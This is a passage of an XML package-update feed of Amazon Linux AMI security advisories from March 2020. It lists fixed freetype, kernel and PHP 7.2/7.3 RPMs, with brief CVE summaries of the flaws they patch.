arch="i686"><filename>Packages/php73-dbg-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.14" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-pdo-dblib-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.14" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-opcache-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.14-1.23.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.14" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.14-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1348</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1348: medium priority package update for freetype</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-9382:
FreeType before 2.6.1 has a buffer over-read in skip_comment in psaux/psobjs.c because ps_parser_skip_PS_token is mishandled in an FT_New_Memory_Face operation.
1763609: CVE-2015-9382 freetype: mishandling ps_parser_skip_PS_token in an FT_New_Memory_Face operation in skip_comment, psaux/psobjs.c, leads to a buffer over-read
CVE-2015-9381:
FreeType before 2.6.1 has a heap-based buffer over-read in T1_Get_Private_Dict in type1/t1parse.c.
1752788: CVE-2015-9381 freetype: a heap-based buffer over-read in T1_Get_Private_Dict in type1/t1parse.c leading to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9381" title="" id="CVE-2015-9381" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9382" title="" id="CVE-2015-9382" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-demos" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-19.15.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-19.15.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-19.15.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-19.15.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-19.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1349</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1349: medium priority 
package update for kernel</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20096:
In the Linux kernel before 5.1, there is a memory leak in __feat_register_sp() in net/dccp/feat.c, which may cause denial of service, aka CID-1d3ff0950e2b.
1791959: CVE-2019-20096 kernel: memory leak in __feat_register_sp() in net/dccp/feat.c
CVE-2019-15918:
An issue was discovered in the Linux kernel before 5.0.10. SMB2_negotiate in fs/cifs/smb2pdu.c has an out-of-bounds read because data structures are incompletely updated after a change from smb30 to smb21.
1760550: CVE-2019-15918 kernel: out-of-bounds read in fs/cifs/smb2pdu.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15918" title="" id="CVE-2019-15918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20096" title="" id="CVE-2019-20096" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.171" release="105.231.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-devel-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.171" release="105.231.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.171-105.231.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.171" release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.171-105.231.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.171" 
release="105.231.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.171-105.231.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1350</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1350: medium priority package update for php72</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7063:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when creating a PHAR archive using the PharData::buildFromIterator() function, the files are added with default permissions (0666, or all access) even if the original files on the filesystem had more restrictive permissions. This may result in files having more lax permissions than intended when such an archive is extracted.
1808536: CVE-2020-7063 php: files added to tar with Phar::buildFromIterator have all-access permissions
CVE-2020-7062:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when using file upload functionality, if upload progress tracking is enabled but session.upload_progress.cleanup is set to 0 (disabled), and the file upload fails, the upload procedure would try to clean up data that does not exist and encounter a null pointer dereference, which would likely lead to a crash.
1808532: CVE-2020-7062 php: NULL pointer dereference in PHP session upload progress
CVE-2020-7061:
In PHP versions 7.3.x below 7.3.15 and 7.4.x below 7.4.3, while extracting PHAR files on Windows using the phar extension, certain content inside a PHAR file could lead to a one-byte read past the allocated buffer. This could potentially lead to information disclosure or a crash.
1808529: CVE-2020-7061 php: heap-based buffer overflow in phar_extract_file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7061" title="" id="CVE-2020-7061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7062" title="" id="CVE-2020-7062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7063" title="" id="CVE-2020-7063" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.28" release="1.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-common-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.28" 
release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.28" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.28-1.21.amzn1.x86_64.rpm</filename></package><package 
name="php72-cli" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.28-1.21.amzn1.i686.rpm</filename></package><package 
name="php72-mysqlnd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.28-1.21.amzn1.i686.rpm</filename></package><package 
name="php72-intl" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.28-1.21.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.28" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.28-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1351</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1351: medium priority package update for php73</title><issued date="2020-03-09 19:20:00" /><updated date="2020-03-13 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7063:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when creating a PHAR archive using the PharData::buildFromIterator() function, the files are added with default permissions (0666, or all access) even if the original files on the filesystem had more restrictive permissions. This may result in files having more lax permissions than intended when such an archive is extracted.
1808536: CVE-2020-7063 php: files added to tar with Phar::buildFromIterator have all-access permissions
CVE-2020-7062:
In PHP versions 7.2.x below 7.2.28, 7.3.x below 7.3.15 and 7.4.x below 7.4.3, when using file upload functionality, if upload progress tracking is enabled but session.upload_progress.cleanup is set to 0 (disabled), and the file upload fails, the upload procedure would try to clean up data that does not exist and encounter a null pointer dereference, which would likely lead to a crash.
1808532: CVE-2020-7062 php: NULL pointer dereference in PHP session upload progress
CVE-2020-7061:
In PHP versions 7.3.x below 7.3.15 and 7.4.x below 7.4.3, while extracting PHAR files on Windows using the phar extension, certain content inside a PHAR file could lead to a one-byte read past the allocated buffer. This could potentially lead to information disclosure or a crash.
1808529: CVE-2020-7061 php: heap-based buffer overflow in phar_extract_file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7061" title="" id="CVE-2020-7061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7062" title="" id="CVE-2020-7062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7063" title="" id="CVE-2020-7063" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-mbstring" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.15" release="1.24.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-process-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" 
